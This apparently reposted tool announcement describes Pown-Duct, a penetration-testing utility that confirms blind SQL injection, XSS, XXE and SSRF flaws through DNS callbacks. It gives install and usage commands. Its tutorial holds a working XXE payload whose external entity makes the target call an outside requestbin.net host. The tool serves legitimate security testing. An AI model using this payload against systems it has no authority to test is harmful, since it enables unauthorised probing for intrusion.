Pown-Duct – Essential Tool For Finding Blind Injection Attacks

Essential tool for finding blind injection attacks using DNS side-channels.CreditsThis tool is part of secapps.com open-source initiative. ___ ___ ___ _ ___ ___ ___ / __| __/ __| /_\ | _ \ _ \/ __| \__ \ _| (__ / _ \| _/ _/\__ \ |___/___\___/_/ \_\_| |_| |___/ https://secapps.comNB: This tool is taking advantage of http://requestbin.net service. Future versions will use a dedicated, custom-built infrastructure.QuickstartThis tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.Install Pown first as usual:$ npm install -g pown@latestInvoke directly from Pown:$ pown ductOtherwise, install this module locally from the root of your project:$ npm install @pown/duct –saveOnce done, invoke pown cli:$ ./node_modules/.bin/pown-cli ductYou can also use the global pown to invoke the tool locally:$ POWN_ROOT=. pown ductUsagepown duct Side-channel attack enablerCommands: pown duct dns DNS ductingOptions: –version Show version number [boolean] –help Show help [boolean]pown duct dnspown duct dnsDNS ductingOptions: –version Show version number [boolean] –help Show help [boolean] –channel Restore channel [string] –output Output format [string] [choices: “string", "hexdump", "json"] [default: "string"]TutorialThere are cases when we need to perform an attack such as sql injection, XSS, XXE or SSRF but the target application is not providing any indication that it is vulnerable. One way to be sure if a vulnerability is present is to try to inject a valid attack vector which forces a DNS resolver to ask for a controlled domain. If the resolution is successful, the attack will be considered successful.NOTE: You might be familiar with Burp Collaborator which provides a similar service for customers.First, we need a disposable dns name to resolve:$ pown duct dnsUsing the provided DNS, compose your payload. For example, the following could trigger a DNS resolution if a XXE vulnerability is present.<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">]><foo>&bar;</foo>If the attack was successful, we will get a message in the terminal.Download Pown-Duct

Link: http://feedproxy.google.com/~r/PentestTools/~3/mkfG1rnLQZQ/pown-duct-essential-tool-for-finding.html